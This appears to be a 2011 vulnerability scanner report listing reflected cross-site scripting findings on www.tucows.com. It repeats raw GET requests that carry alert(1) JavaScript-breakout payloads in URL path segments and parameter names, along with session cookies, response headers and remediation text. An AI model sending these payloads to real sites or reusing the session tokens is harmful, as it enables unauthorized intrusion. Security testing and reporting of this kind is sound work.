The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14a3c"-alert(1)-"0443944911d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.014a3c"-alert(1)-"0443944911d/css/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:53 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 199e2"-alert(1)-"fac9720e4d9 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css199e2"-alert(1)-"fac9720e4d9/style.css HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26131"-alert(1)-"79cf1522983 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css26131"-alert(1)-"79cf1522983 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:27:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5be67"-alert(1)-"26a6c055dc5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/corpbar/cb3.0/css/style.css?5be67"-alert(1)-"26a6c055dc5=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:00 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41642"-alert(1)-"3787a403d76 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images41642"-alert(1)-"3787a403d76/newassets/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:19 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7b02"-alert(1)-"7b6e920b807 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassetsf7b02"-alert(1)-"7b6e920b807/includes/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:26 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56eb6"-alert(1)-"cf82ccc0327 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes56eb6"-alert(1)-"cf82ccc0327/js/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:37 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22c99"-alert(1)-"55fa4663456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js22c99"-alert(1)-"55fa4663456/aalib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:48 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51c02"-alert(1)-"c3378b8f5df was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/aalib.js51c02"-alert(1)-"c3378b8f5df HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:59 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
3.261. http://www.tucows.com/images/newassets/includes/js/aalib.js [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.tucows.com
Path: /images/newassets/includes/js/aalib.js
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85680"-alert(1)-"13364046c33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includes/js/aalib.js?85680"-alert(1)-"13364046c33=1 HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:05 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1638"-alert(1)-"93eb7715e1d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /imagese1638"-alert(1)-"93eb7715e1d/newassets/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:22 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94b97"-alert(1)-"7385601d3b4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets94b97"-alert(1)-"7385601d3b4/includes/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:32 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5955"-alert(1)-"19d51f958d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /images/newassets/includesc5955"-alert(1)-"19d51f958d8/js/ajaxlib.js HTTP/1.1 Host: www.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;
Response
HTTP/1.0 404 Not Found Date: Thu, 03 Feb 2011 21:26:43 GMT Server: Apache/2.2.14 (Ubuntu) X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html
